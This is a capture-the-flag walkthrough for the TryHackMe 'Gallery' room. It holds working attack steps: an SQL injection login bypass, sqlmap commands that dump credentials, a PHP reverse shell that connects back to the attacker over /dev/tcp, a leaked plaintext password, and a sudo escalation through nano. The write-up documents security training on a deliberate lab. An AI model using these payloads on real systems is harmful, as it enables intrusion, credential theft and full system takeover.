Gallery
Room Link: https://tryhackme.com/room/gallery666
Initial Scan
Kali
nmap -A $VICTIM
Scan all ports
No other ports found
Kali
nmap -sV -sT -O -p 1-65535 $VICTIMTCP/80 - HTTP
Kali
gobuster dir -u http://$VICTIM -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt
TCP/8080 - HTTP
Kali
gobuster dir -u http://$VICTIM:8080 -w /usr/share/wordlists/SecLists/Discovery/Web-Content/directory-list-2.3-medium.txt -x php,html,txt --wildcardTCP/80 - HTTP
SQL Injection
SQL injection worked on username field
Username: 1' or '1'='1'-- -
Password: anything
We found two databases
Kali
sudo sqlmap -r request.req --dbs
Get tables
Kali
sudo sqlmap -r request.req --current-db gallery_db --tables
Get fields for table users
Kali
sudo sqlmap -r request.req --current-db gallery_db --tables -T users --columns
Get values of the username and password fields. I couldn't crack the hash.
Kali
sudo sqlmap -r request.req --current-db gallery_db --tables -T users -C username,password --dump
Initial Shell
I was able to upload a php reverse shell instead of an image
Kali
nc -lvnp 443revshell.php code
<?php
exec("/bin/bash -c 'bash -i >& /dev/tcp/$KALI/443 0>&1'");
?>
Get autocomplete
python3 -c 'import pty; pty.spawn("/bin/bash")'
ctrl + Z
stty raw -echo;fg
We found a list of passwords from mike in a file called accounts and another password in history
Victim
su mike
Password: b3stpassw0rdbr0xx
Privilege Escalation
Exploit: https://gtfobins.github.io/gtfobins/nano/
mike is able to run a script with NOPASSWD, looking at the script it, there are a few options to select. One option is to run nano which we can use to get sudo. I also noticed my terminal would not open nano so I exported xterm
Victim
sudo -l
export TERM="xterm"
Victim
sudo /bin/bash /opt/rootkit.sh
^R^X
reset; sh 1>&0 2>&0
Last updated